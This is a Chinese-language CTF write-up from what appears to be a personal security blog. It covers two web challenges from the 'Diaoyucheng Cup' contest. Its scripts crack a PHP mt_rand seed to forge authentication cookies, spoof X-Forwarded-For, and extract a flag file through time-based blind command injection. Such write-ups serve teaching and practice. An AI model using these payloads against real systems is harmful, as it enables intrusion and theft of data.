文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

流量分析

机器学习

基础学习

Python

Python编程

Java

Java编程

算法

Leetcode

随笔

经验

技术

 2020-08-28   361

“钓鱼城杯”国际网络安全技能大赛Writeup

easyseed

index.bak:

1
2
3
4
5
6
7
8
9
10
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
function random($length, $chars = '0123456789ABC') {
$hash = '';
$max = strlen($chars) - 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}

使用php_mt_rand随机数种子爆破。
用脚本生成php_mt_rand工具的参数:

1
2
3
4
5
6
7
8
9
10
11
str1 = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'
str2 = 'vEUHaY'
str3 = str1[::-1]
length = len(str2)
res = ''
for i in range(len(str2)):
for j in range(len(str1)):
if str2[i] == str1[j]:
res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1) + ' '
break
print(res)

爆破seed
图片

再生成key值

1
2
3
4
5
6
7
8
9
10
11
12
13
mt_srand('718225');
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
echo $lock.PHP_EOL;
echo $key;
function random($length, $chars = '0123456789ABC') {
$hash = '';
$max = strlen($chars) - 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}

发送payload:

1
2
3
4
5
6
7
8
9
10
11
import requests
url = '''http://122.112.252.28:20001/'''
cookies = {
'key': 'nRtqGR8mtd9ZOPyI',
'lock': 'vEUHaY'
}
headers = {
'X-Forwarded-For': '127.0.0.1'
}
res = requests.get(url=url, cookies=cookies, headers=headers)
print(res.text)

easyweb

抓包

然后无回显命令执行,然后盲注一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests
from time import time

url = 'http://119.3.37.185/'
payload = 'if [ `cut -c {num1} /flag.txt` = "{num2}" ];then sleep 2;fi'
flag = ''
for i in range(400):
for j in range(32,127):
data = {
'cmd':payload.format(num1=str(i),num2=chr(j))
}
start_time = time()
requests.post(url,data=data)
if time()-start_time>2:
flag += chr(j)
print(flag)
if chr(j) == '}':
exit()
Copyright © ca01h 2019-2020 | 本站总访问量